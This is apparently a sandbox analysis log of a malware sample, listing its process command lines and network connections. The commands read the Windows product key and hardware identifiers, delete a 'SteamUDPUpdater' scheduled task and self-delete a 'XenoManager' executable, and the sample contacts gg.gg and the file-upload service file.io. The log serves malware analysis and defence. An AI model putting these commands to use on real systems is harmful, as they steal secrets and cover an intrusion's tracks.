C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xe4,0xd8,0x104,0xe0,0x108,0x7ffaf872ab58,0x7ffaf872ab68,0x7ffaf872ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2280 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3080 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4328 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4548 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ff7e098ae48,0x7ff7e098ae58,0x7ff7e098ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4728 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4320 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3152 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5332 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3400 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5220 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3096 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4592 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5364 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5128 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4724 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5648 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5784 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5928 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5940 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5664 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6396 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=6408 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=6540 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6716 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=6980 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7116 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=7456 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6564 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=7580 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=7936 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8096 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=6412 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=2468 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8012 --field-trial-handle=1928,i,11562003709266760329,13153908463965530295,131072 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /query /v /fo csv
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /delete /tn "\SteamUDPUpdater" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\XenoManager\SteamUDPUpdater.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 13.107.42.16:443 | tcp | |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gg.gg | udp |
| RU | 91.215.42.31:443 | gg.gg | tcp |
| RU | 91.215.42.31:443 | gg.gg | tcp |
| US | 8.8.8.8:53 | file.io | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 8.8.8.8:53 | www.file.io | udp |
| DE | 108.157.4.66:443 | www.file.io | tcp |
| US | 8.8.8.8:53 | 31.42.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.107.55.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hb.vntsm.com | udp |
| GB | 143.244.38.136:443 | hb.vntsm.com | tcp |
| GB | 143.244.38.136:443 | hb.vntsm.com | tcp |
| US | 8.8.8.8:53 | hb.vntsm.io | udp |
| US | 8.8.8.8:53 | hb-vntsm-com.global.ssl.fastly.net | udp |
| US | 151.101.65.194:443 | hb-vntsm-com.global.ssl.fastly.net | tcp |
| US | 104.22.47.142:443 | hb.vntsm.io | tcp |
| US | 8.8.8.8:53 | 66.4.157.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.38.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.47.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.206:443 | analytics.google.com | tcp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | cdn.exelator.com | udp |
| DE | 18.154.64.11:443 | c.amazon-adsystem.com | tcp |
| DE | 13.226.153.95:443 | cdn.exelator.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | mydmp.exelator.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| DE | 18.154.64.11:443 | c.amazon-adsystem.com | tcp |
| IE | 34.254.143.3:443 | mydmp.exelator.com | tcp |
| DE | 13.226.153.19:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.167.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.64.154.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.153.226.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | onsite-tag-logs.apps.nielsen.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| US | 34.230.174.228:443 | onsite-tag-logs.apps.nielsen.com | tcp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| GB | 172.217.169.34:443 | cm.g.doubleclick.net | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| GB | 172.217.169.34:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | load.exelator.com | udp |
| US | 8.8.8.8:53 | proc.ad.cpe.dotomi.com | udp |
| NL | 64.158.223.146:443 | proc.ad.cpe.dotomi.com | tcp |
| US | 8.8.8.8:53 | a.ad.gt | udp |
| US | 172.67.23.234:443 | a.ad.gt | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 3.143.254.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.153.226.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.174.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.220.33.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.174.230.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.23.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.223.158.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 192.178.49.163:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| DE | 162.19.138.117:443 | lb.eu-1-id5-sync.com | tcp |
| DE | 162.19.138.120:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | 120.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| US | 8.8.8.8:53 | i.clean.gg | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
| DE | 18.173.232.53:443 | aax.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | cdn.edkt.io | udp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | elb.the-ozone-project.com | udp |
| US | 8.8.8.8:53 | prg.smartadserver.com | udp |
| US | 8.8.8.8:53 | apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 8.8.8.8:53 | hb-api.omnitagjs.com | udp |
| US | 34.120.111.33:443 | cdn.edkt.io | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | track.venatusmedia.com | udp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 69.166.1.32:443 | apex.go.sonobi.com | tcp |
| US | 104.18.43.178:443 | elb.the-ozone-project.com | tcp |
| DE | 3.124.64.248:443 | tlx.3lift.com | tcp |
| NL | 81.17.55.112:443 | prg.smartadserver.com | tcp |
| NL | 81.17.55.112:443 | prg.smartadserver.com | tcp |
| NL | 185.89.211.84:443 | ib.adnxs.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| IE | 52.215.105.210:443 | track.venatusmedia.com | tcp |
| DE | 52.58.238.229:443 | btlr.sharethrough.com | tcp |
| DE | 52.58.238.229:443 | btlr.sharethrough.com | tcp |
| DE | 52.58.238.229:443 | btlr.sharethrough.com | tcp |
| DE | 52.58.238.229:443 | btlr.sharethrough.com | tcp |
| NL | 145.40.97.66:443 | prebid.a-mo.net | tcp |
| US | 34.95.69.49:443 | i.clean.gg | udp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| US | 172.67.75.241:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | 4b4bee17ad13c8b14470097bf905dcd9.safeframe.googlesyndication.com | udp |
| US | 8.8.8.8:53 | tg1.aniview.com | udp |
| GB | 172.217.169.65:443 | 4b4bee17ad13c8b14470097bf905dcd9.safeframe.googlesyndication.com | tcp |
| SE | 23.34.233.243:443 | tg1.aniview.com | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | 145.23.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.69.95.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.111.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.43.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.55.17.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.211.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.105.215.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.238.58.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.97.40.145.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.64.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.189.64.185.in-addr.arpa | udp |
